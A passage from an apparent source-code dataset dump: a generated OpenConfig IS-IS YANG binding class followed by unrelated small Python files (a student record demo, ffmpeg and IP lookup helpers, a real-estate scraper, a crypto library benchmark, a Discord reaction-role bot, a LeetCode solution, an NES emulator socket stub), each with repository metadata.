YANG Description: IPv6 MPLS Traffic Engineering Router-ID.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ipv6_router_id must be of a type compatible with inet:ipv6-address-no-zone""",
'defined-type': "inet:ipv6-address-no-zone",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)""",
})
self.__ipv6_router_id = t
if hasattr(self, '_set'):
self._set()
def _unset_ipv6_router_id(self):
self.__ipv6_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
enabled = __builtin__.property(_get_enabled)
ipv4_router_id = __builtin__.property(_get_ipv4_router_id)
ipv6_router_id = __builtin__.property(_get_ipv6_router_id)
_pyangbind_elements = OrderedDict([('enabled', enabled), ('ipv4_router_id', ipv4_router_id), ('ipv6_router_id', ipv6_router_id), ])
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/traffic-engineering/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS TE state information.
"""
__slots__ = ('_path_helper', '_extmethods', '__enabled','__ipv4_router_id','__ipv6_router_id',)
_yang_name = 'state'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__enabled = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
self.__ipv4_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
self.__ipv6_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['network-instances', 'network-instance', 'protocols', 'protocol', 'isis', 'levels', 'level', 'traffic-engineering', 'state']
def _get_enabled(self):
"""
Getter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/enabled (boolean)
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
return self.__enabled
def _set_enabled(self, v, load=False):
"""
Setter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/enabled (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enabled() directly.
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """enabled must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)""",
})
self.__enabled = t
if hasattr(self, '_set'):
self._set()
def _unset_enabled(self):
self.__enabled = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
def _get_ipv4_router_id(self):
"""
Getter method for ipv4_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv4_router_id (inet:ipv4-address-no-zone)
YANG Description: IPv4 MPLS Traffic Engineering Router-ID.
"""
return self.__ipv4_router_id
def _set_ipv4_router_id(self, v, load=False):
"""
Setter method for ipv4_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv4_router_id (inet:ipv4-address-no-zone)
If this variable is read-only (config: false) in the
source YANG file, then _set_ipv4_router_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ipv4_router_id() directly.
YANG Description: IPv4 MPLS Traffic Engineering Router-ID.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ipv4_router_id must be of a type compatible with inet:ipv4-address-no-zone""",
'defined-type': "inet:ipv4-address-no-zone",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)""",
})
self.__ipv4_router_id = t
if hasattr(self, '_set'):
self._set()
def _unset_ipv4_router_id(self):
self.__ipv4_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
def _get_ipv6_router_id(self):
"""
Getter method for ipv6_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv6_router_id (inet:ipv6-address-no-zone)
YANG Description: IPv6 MPLS Traffic Engineering Router-ID.
"""
return self.__ipv6_router_id
def _set_ipv6_router_id(self, v, load=False):
"""
Setter method for ipv6_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv6_router_id (inet:ipv6-address-no-zone)
If this variable is read-only (config: false) in the
source YANG file, then _set_ipv6_router_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ipv6_router_id() directly.
YANG Description: IPv6 MPLS Traffic Engineering Router-ID.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ipv6_router_id must be of a type compatible with inet:ipv6-address-no-zone""",
'defined-type': "inet:ipv6-address-no-zone",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)""",
})
self.__ipv6_router_id = t
if hasattr(self, '_set'):
self._set()
def _unset_ipv6_router_id(self):
self.__ipv6_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
enabled = __builtin__.property(_get_enabled)
ipv4_router_id = __builtin__.property(_get_ipv4_router_id)
ipv6_router_id = __builtin__.property(_get_ipv6_router_id)
_pyangbind_elements = OrderedDict([('enabled', enabled), ('ipv4_router_id', ipv4_router_id), ('ipv6_router_id', ipv6_router_id), ])
| [
"zblevins@netflix.com"
] | zblevins@netflix.com |
95ec8fd7a6bd143e8448f66896fba383bddf5373 | e7d5db388df22905d3a00eaf970acbcf1c839bab | /python/.old3/student.py | 8e4f20257fe54f0a6719c69fc0c6d7f0ee7fff92 | [] | no_license | seanho00/twu | 0c47afe4bfb47bb86c81f4871a8e5973dbc843a2 | 5e97bd08c8a281f77c16a1ae890d234972a4622e | refs/heads/master | 2020-12-25T15:08:09.413702 | 2016-08-30T04:52:55 | 2016-08-30T04:52:55 | 66,873,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,188 | py | """Definitions for a student info record.
Sean Ho for CMPT140 demo.
"""
class Date:
def __init__(self, y=2000, m=1, d=1):
"""Setup a new date object,
optionally with the given year/month/day.
pre: y/m/d must be integers in the appropriate range.
See also: datetime.date:
http://docs.python.org/library/datetime.html"""
self.year = y
self.month = m
self.day = d
def __str__(self):
"""Return a human-readable string representation."""
return "%02d/%02d/%04d" % \
(self.day, self.month, self.year)
class Student:
def __init__(self, f='', l='', i=0, bd=None, g=4.0):
"""Setup a new Student, optionally with the
given first/last name, ID#, and birthdate."""
self.first = f
self.last = l
self.ID = i
self.GPA = g
if bd != None:
self.birthdate = bd
else:
self.birthdate = Date()
def __str__(self):
"""Return a human-readable string representation."""
return "ID# %06d: %s %s (%s) GPA=%4.2f" % \
(self.ID, self.first, self.last, self.birthdate, self.GPA)
| [
"github@seanho.com"
] | github@seanho.com |
4d42a0286cd3434b0e825806b741203dfc7d2dc3 | a5fcfbef729c372d3a5396619c8ab03085d9fdb1 | /pylib/cmdutils.py | ce1c70348424691f2a26817d0b7c833ec48d70c9 | [] | no_license | decli/winterpy | 88bb127729937885d7ae021e2b6439d8dd8bdc00 | 082cf9f30c66a33291b4a7737f91e90990c59d92 | refs/heads/master | 2021-01-18T08:43:06.804938 | 2014-06-01T10:41:15 | 2014-06-01T10:58:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | # vim:fileencoding=utf-8
'''
call external tools to do things.
'''
import subprocess
from functools import lru_cache
@lru_cache(maxsize=20)
def lookupip(ip, cmd='cip'):
return subprocess.getoutput(subprocess.list2cmdline([cmd, ip])).replace('CZ88.NET', '').strip() or '-'
def check_mediafile(file):
'''intergrity check with ffmpeg
also return ``False`` when reading the file fails
From http://superuser.com/a/100290/40869
'''
p = subprocess.Popen(
['ffmpeg', '-v', 'error', '-i', file, '-f', 'null', '-'],
stderr = subprocess.PIPE)
_, e = p.communicate()
return not bool(e.strip())
| [
"lilydjwg@gmail.com"
] | lilydjwg@gmail.com |
f4b639cb8c07e02fec8aa6043412392fe54c6158 | a8d68074db5c2b2697650ed0281979d3e00cf5a8 | /Nyspider/www.fang.com/get_hourse.py | 2f84d0325f7b83294a58f290281d20927869f256 | [] | no_license | 15807857476/bogdata-2 | 9595609ea2ae5ae0a48c511f911df2498456467e | 1934cdfa234b77ca91e349b84688db113ff39e8c | refs/heads/master | 2023-05-26T19:10:18.439269 | 2019-05-24T02:50:41 | 2019-05-24T02:50:41 | 188,327,526 | 3 | 1 | null | 2023-05-22T21:37:27 | 2019-05-24T00:53:28 | Python | UTF-8 | Python | false | false | 5,243 | py | #coding:utf-8
import requests
from bs4 import BeautifulSoup
import xlwt3
import threading
headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.5",
"Connection": "keep-alive",
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"}
class Get_infor(threading.Thread):
def __init__(self,url):
super(Get_infor,self).__init__()
self.url=url.replace('esf/','')+'xiangqing/'
self.headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.5",
"Connection": "keep-alive",
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"}
def run(self):
self.statue=1
try:
try:
print(self.url)
html=requests.get(self.url,headers=self.headers,timeout=30).text.encode('ISO-8859-1').decode('gbk','ignore')
except:
html=requests.get(self.url,headers=self.headers,timeout=30).text
soup=BeautifulSoup(html,'lxml').find('div',attrs={'class':'leftinfo'})
self.title=soup.find('span',attrs={'class':'floatl'}).get_text()
pri_table=soup.find('dl',attrs={'class':'firstpic'}).find('dd',style='margin-top:10px;').find_all('span')
self.price=pri_table[0].get_text()
self.month_lilv=pri_table[1].get_text()
self.lilv=pri_table[2].get_text()
tables=soup.find('dl',attrs={'class':'lbox'}).find_all('dd')
self.ground=' '
self.address=' '
self.area=' '
self.cell=' '
self.wuye=' '
self.date=' '
self.jiegou=' '
self.type=' '
self.mianji=' '
self.ground=' '
self.hushu=' '
self.green=' '
self.rongji=' '
self.wuye_price=' '
for item in tables:
if item.find('strong').get_text()=='小区地址:':
self.address=item.get('title')
if item.find('strong').get_text()=='所属区域:':
self.area=item.get_text().replace('所属区域:','')
if item.find('strong').get_text()=='环线位置':
self.cell=item.get_text().replace('环线位置:','')
if item.find('strong').get_text()=='物业类别:':
self.wuye=item.get_text().replace('物业类别:','')
if item.find('strong').get_text()=='竣工时间:':
self.date=item.get_text().replace('竣工时间:','')
if item.find('strong').get_text()=='建筑结构:':
self.jiegou=item.get_text().replace('建筑结构:','')
if item.find('strong').get_text()=='建筑类别:':
self.type=item.get_text().replace('建筑类别:','')
if item.find('strong').get_text()=='建筑面积:':
self.mianji=item.get_text().replace('建筑面积:','')
if item.find('strong').get_text()=='占地面积:':
self.ground=item.get_text().replace('占地面积:','')
if item.find('strong').get_text()=='当期户数:':
self.hushu=item.get_text().replace('当期户数:','')
if item.find('strong').get_text()=='绿 化 率:':
self.green=item.get_text().replace('绿 化 率:','')
if item.find('strong').get_text()=='容 积 率:':
self.rongji=item.get_text().replace('容 积 率:','')
if item.find('strong').get_text()=='物 业 费:':
self.wuye_price=item.get_text().replace('物 业 费:','')
except:
self.statue=0
def get_urls(url):
html=requests.get(url,headers=headers).text
table=BeautifulSoup(html,'lxml').find('div',attrs={'class':'houseList'}).find_all('div',id='Div1')
urls=[]
for item in table:
urls.append(item.find('div',attrs={'class':'img rel floatl'}).find('a').get('href'))
return urls
class Main():
def __init__(self):
self.f=open('data.txt','w')
self.count=0
def run(self):
for page in range(80):
urls=get_urls('http://esf.sh.fang.com/housing/18__0_0_0_0_%s_0_0/'%(str(page+1)))
for url in urls:
work=Get_infor(url)
work.run()
if work.statue==0:
continue
infor=work.title+'|'+work.address+'|'+work.price+'|'+work.month_lilv+'|'+work.lilv+"|"+work.area+'|'+work.cell+'|'+work.wuye+'|'+work.date+'|'+work.jiegou+'|'+work.type+'|'+work.mianji+'|'+work.ground+'|'+work.hushu+'|'+work.green+"|"+work.rongji+'|'+work.wuye_price+'|'+work.url+'\n'
self.f.write(infor)
self.count+=1
print(self.count)
if __name__=='__main__':
work=Main()
work.run()
| [
"2397955090@qq.com"
] | 2397955090@qq.com |
daa66efa2fa8e1a639c548a211243e733270d3e1 | 63ace5832d453e325681d02f6496a0999b72edcb | /benchmark/tests/ed25519_blake2b_tests.py | 5919601af41a2317c191c4864206a57fd69662b9 | [
"MIT"
] | permissive | ebellocchia/bip_utils | c9ec04c687f4247e57434319e36b2abab78f0b32 | d15c75ddd74e4838c396a0d036ef6faf11b06a4b | refs/heads/master | 2023-09-01T13:38:55.567370 | 2023-08-16T17:04:14 | 2023-08-16T17:04:14 | 251,130,186 | 244 | 88 | MIT | 2023-08-23T13:46:19 | 2020-03-29T20:42:48 | Python | UTF-8 | Python | false | false | 1,606 | py | # Copyright (c) 2021 Emanuele Bellocchia
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Imports
from bip_utils import Bip44, Bip44Coins
from tests.bip44_tests import Bip44Tests
# Ed25519Blake2b tests class
class Ed25519Blake2bTests(Bip44Tests):
# Constructor
def __init__(self,
test_num: int,
test_itr_num: int,
test_cache_num: int) -> None:
super().__init__(Bip44,
Bip44Coins.NANO,
test_num,
test_itr_num,
test_cache_num)
| [
"54482000+ebellocchia@users.noreply.github.com"
] | 54482000+ebellocchia@users.noreply.github.com |
9e4fc391a584e7ebf2c2497e63bc5969b3f98b65 | 39dc00c9ac403d93800781b75c4d28079d66c407 | /03_reaction_roles.py | c1747c27ec95a2a25fd6d6cafc8a3528a656a854 | [] | no_license | aleks969/Discord-Bot-Tutorials | 631352c2f030471c2b956dfb820c59944fd2cee3 | 96b4357cf7f520b10de2823a48dd281525059ebf | refs/heads/master | 2023-08-15T00:09:48.680245 | 2021-09-28T04:27:32 | 2021-09-28T04:27:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,181 | py | import discord
"""
client = discord.Client()
@client.event
async def on_ready():
print('Ready')
client.run('')
"""
# https://discordpy.readthedocs.io/en/latest/intents.html
# https://discord.com/developers/docs/topics/gateway#gateway-intents
# https://discord.com/developers/docs/topics/gateway#list-of-intents
class MyClient(discord.Client):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.target_message_id = 891404574114594836
async def on_ready(self):
print('Ready')
async def on_raw_reaction_add(self, payload):
"""
Give a role based on a reaction emoji
"""
if payload.message_id != self.target_message_id:
return
guild = client.get_guild(payload.guild_id)
if payload.emoji.name == '🥔':
role = discord.utils.get(guild.roles, name='Potato person')
await payload.member.add_roles(role)
elif payload.emoji.name == '💩':
role = discord.utils.get(guild.roles, name='Chocolate lover')
await payload.member.add_roles(role)
elif payload.emoji.name == '🐵':
role = discord.utils.get(guild.roles, name='Funky monkey')
await payload.member.add_roles(role)
async def on_raw_reaction_remove(self, payload):
"""
Remove a role based on a reaction emoji
"""
if payload.message_id != self.target_message_id:
return
guild = client.get_guild(payload.guild_id)
member = guild.get_member(payload.user_id)
if payload.emoji.name == '🥔':
role = discord.utils.get(guild.roles, name='Potato person')
await member.remove_roles(role)
elif payload.emoji.name == '💩':
role = discord.utils.get(guild.roles, name='Chocolate lover')
await member.remove_roles(role)
elif payload.emoji.name == '🐵':
role = discord.utils.get(guild.roles, name='Funky monkey')
await member.remove_roles(role)
intents = discord.Intents.default()
intents.members = True
client = MyClient(intents=intents)
client.run('')
| [
"buckyroberts@gmail.com"
] | buckyroberts@gmail.com |
054ace37618a4a5d09d7b5c5c11ecb90b4ad3f39 | b6a31ec10b39a3dbae183ba40c42078cadf88946 | /256. Paint House.py | f7d21cd7ee9430bc39d12fadd63f2ffe33b083ef | [] | no_license | QIAOZHIBAO0104/My-Leetcode-Records | 69fabd11b279f08861cd644973e51bf664da0d90 | 882724c8d50b2f21193c81e5072c31385c5e6b8e | refs/heads/main | 2023-07-11T00:17:02.368441 | 2021-08-07T16:19:45 | 2021-08-07T16:19:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,045 | py | '''
https://leetcode.com/problems/paint-house/
There is a row of n houses, where each house can be painted one of three colors: red, blue, or green.
The cost of painting each house with a certain color is different. You have to paint all the houses such that no two adjacent houses have the same color.
The cost of painting each house with a certain color is represented by a n x 3 cost matrix.
For example, costs[0][0] is the cost of painting house 0 with the color red; costs[1][2] is the cost of painting house 1 with color green, and so on... Find the minimum cost to paint all houses.
Example 1:
Input: costs = [[17,2,17],[16,16,5],[14,3,19]]
Output: 10
Explanation: Paint house 0 into blue, paint house 1 into green, paint house 2 into blue.
Minimum cost: 2 + 5 + 3 = 10.
'''
'''
Dynamic Programming.
Time:O(n)
Space:O(1)
'''
class Solution:
def minCost(self, costs: List[List[int]]) -> int:
if not costs: return 0
dp = [[0 for _ in range(3)]for _ in range(len(costs))]
dp[0] = costs[0]
for i in range(1, len(costs)):
dp[i][0] = costs[i][0]+min(dp[i-1][1], dp[i-1][2])
dp[i][1] = costs[i][1]+min(dp[i-1][0], dp[i-1][2])
dp[i][2] = costs[i][2]+min(dp[i-1][1], dp[i-1][0])
return min(dp[-1])
'''
Memoization.
Time:O(n)
Space:O(n)
'''
class Solution:
def minCost(self, costs: List[List[int]]) -> int:
def paint(n, color):
if (n, color) in self.memo:
return self.memo[(n, color)]
money = costs[n][color]
if n==len(costs)-1:
pass
elif color==0:
money += min(paint(n+1, 1), paint(n+1, 2))
elif color==1:
money += min(paint(n+1, 0), paint(n+1, 2))
elif color==2:
money += min(paint(n+1, 1), paint(n+1, 0))
self.memo[(n,color)] = money
return money
if costs == []: return 0
self.memo = {}
return min(paint(0,0), paint(0,1), paint(0,2))
| [
"noreply@github.com"
] | QIAOZHIBAO0104.noreply@github.com |
7e1c7bee1e6cb127c838be3b6a3b85c4cb6533af | 9c148df61545c38f0cbdd00fba3f504458a382b1 | /nes_server.py | 59b8c7d574cdd1cff7357b7b6fe2ea0fd566ad3a | [] | no_license | fafaschiavo/contrAI | 4244d5be76bba35a1f8662a5a95dadc099e0de3e | 3900d10f28afefe492be88948d0cdcdac3d3c537 | refs/heads/master | 2021-04-28T13:25:59.718148 | 2018-03-10T20:57:56 | 2018-03-10T20:57:56 | 122,105,205 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,125 | py | import socket
import json
import os
import glob
from threading import Thread
import time
import sys
import os
import subprocess
import cv2
sys.path.append(os.path.join(os.path.dirname(sys.argv[0]), "subfolder"))
screenshots_folder = 'screenshots'
keep_socket_alive = True
data_received = ''
data_to_send = False
class socketThread(Thread):
IP = '127.0.0.1'
input_port = 53475
output_port = 53474
def __init__(self, input_port, output_port):
Thread.__init__(self)
self.input_port = input_port
self.output_port = output_port
self.UDPSock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
self.listen_addr = (self.IP,input_port)
self.UDPSock.bind(self.listen_addr)
def run(self):
global keep_socket_alive
global data_received
global data_to_send
while True:
if data_to_send:
print 'flag 3'
self.UDPSock.sendto(bytes(json.dumps(data_to_send)), (self.IP, self.output_port))
data_to_send = False
socket_thread = socketThread(53475, 53474)
socket_thread.daemon = True
socket_thread.start()
while True:
time.sleep(0.5)
print 'flag 1'
data_to_send = {
'command': 'frameadvance',
} | [
"fayschiavo@gmail.com"
] | fayschiavo@gmail.com |
